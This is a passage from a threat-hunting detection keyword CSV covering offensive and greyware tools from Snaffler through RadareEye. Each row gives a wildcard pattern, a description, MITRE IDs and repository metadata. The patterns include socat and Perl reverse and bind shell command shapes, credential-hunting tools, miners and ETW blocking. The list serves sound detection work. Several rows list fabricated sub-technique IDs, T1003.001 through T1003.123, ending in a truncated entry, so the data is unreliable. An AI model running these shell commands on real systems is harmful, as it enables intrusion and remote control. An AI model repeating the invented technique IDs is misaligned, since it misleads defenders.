tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - 
T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - 
T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnafflerMessage.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - 
T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnafflerMessageType.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - 
T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffPoint.exe*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" +"*SnaffPoint-main*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" +"*snallygaster*","offensive_tool_keyword","snallygaster","Finds file leaks and other security problems on HTTP servers.snallygaster is a tool that looks for files accessible on web servers that shouldn't be public and can pose a security risk.","T1595.001 - T1210","TA0007 - TA0009","N/A","N/A","Information Gathering","https://github.com/hannob/snallygaster","1","0","N/A","N/A","10","2009","240","2023-07-31T07:26:19Z","2018-04-10T12:01:16Z" +"*sneaky_gophish*","offensive_tool_keyword","gophish","Hiding GoPhish from the boys in blue","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/puzzlepeaches/sneaky_gophish/","1","1","N/A","10","10","135","38","2022-12-06T11:58:00Z","2021-06-24T12:41:54Z" +"*SniffAir*","offensive_tool_keyword","SniffAir","SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected 
wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic. looking for potential security flaws. Along with the prebuilt queries. SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.","T1530 - T1170 - T1059 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Tylous/SniffAir","1","1","N/A","N/A","10","1161","175","2020-10-14T04:00:27Z","2017-02-20T18:32:32Z" +"*sniffer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*sniffer-master.zip*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" +"*SnifferSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*sniffglue*","offensive_tool_keyword","sniffglue","Secure multithreaded packet sniffer","T1040 - T1041 - T1046 - T1057 - T1071.001","TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/sniffglue","1","0","N/A","N/A","10","970","89","2022-07-13T22:44:18Z","2017-09-12T16:26:24Z" +"*snmp_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*snmp-check * -c public*","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. 
It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*snmpwalk -v1 -cpublic *","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" +"*snmpwalk * public *1.3.6.1.*","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" +"*snmpwalk -c public -v 1 *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*snmpwalk -c public -v 2c *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*snmpwalk -c public -v1 *","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - 
T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" +"*snmpwn *passwords.txt*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" +"*snmpwn.rb* --hosts *","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" +"*socat *","offensive_tool_keyword","socat","socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file. pipe. 
device","T1048 - T1055 - T1562","TA0003 - TA0002 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/craSH/socat","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*socat exec:*","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","N/A","shell spawning","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*socat FILE:*tty*raw*echo=0 TCP*:*","greyware_tool_keyword","socat","socat bind shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*socat file:*tty*raw*echo=0 tcp-listen:*","greyware_tool_keyword","socat","socat reverse shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*socat -O /tmp/*","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","N/A","shell spawning","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*socat TCP4-LISTEN:* fork TCP4:*:*","greyware_tool_keyword","socat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*socat tcp4-listen:1337*","offensive_tool_keyword","socat","listening on port 
1337 -observed in variousmalware and poc explitation tools","T1049 - T1021.001 - T1572","TA0002 - TA0011 - TA0040","N/A","N/A","C2","N/A","1","0","N/A","8","6","N/A","N/A","N/A","N/A" +"*socat tcp-connect*","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","N/A","shell spawning","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*socat tcp-connect:*:* exec:*bash -li**pty*stderr*setsid*sigint*sane*","greyware_tool_keyword","socat","socat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*socat tcp-connect:*:* exec:/bin/sh*","greyware_tool_keyword","socat","socat reverse shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*socat TCP-LISTEN:**reuseaddr*fork EXEC:/bin/sh*","greyware_tool_keyword","socat","socat bind shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*Social Engineer Toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. LLC an information security consulting firm located in Cleveland. 
Ohio.","T1566 - T1059.004 - T1564.001","TA0001 - TA0002 - TA0007","N/A","N/A","Phishing","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*social_engineering/web_cloner*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*SocialPwned.git*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" +"*socialpwned.py*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" +"*socialpwned_*.txt*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" +"*socket(S*PF_INET*SOCK_STREAM*getprotobyname(*tcp*))*if(connect(S*sockaddr_in($p*inet_aton($i))))*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","1","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*SocketHijacking.*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*socks*127.0.0.1 9050*","offensive_tool_keyword","proxychains","(TOR default) proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*socks5_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*socks5h://127.0.0.1:9050*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept 
Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*socky whoami*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*SOFTWARE\WOW6432Node\FreeFileSync*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*Soledge/BlockEtw*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*solo_mine_example.cmd*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*souravbaghz/RadareEye*","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device 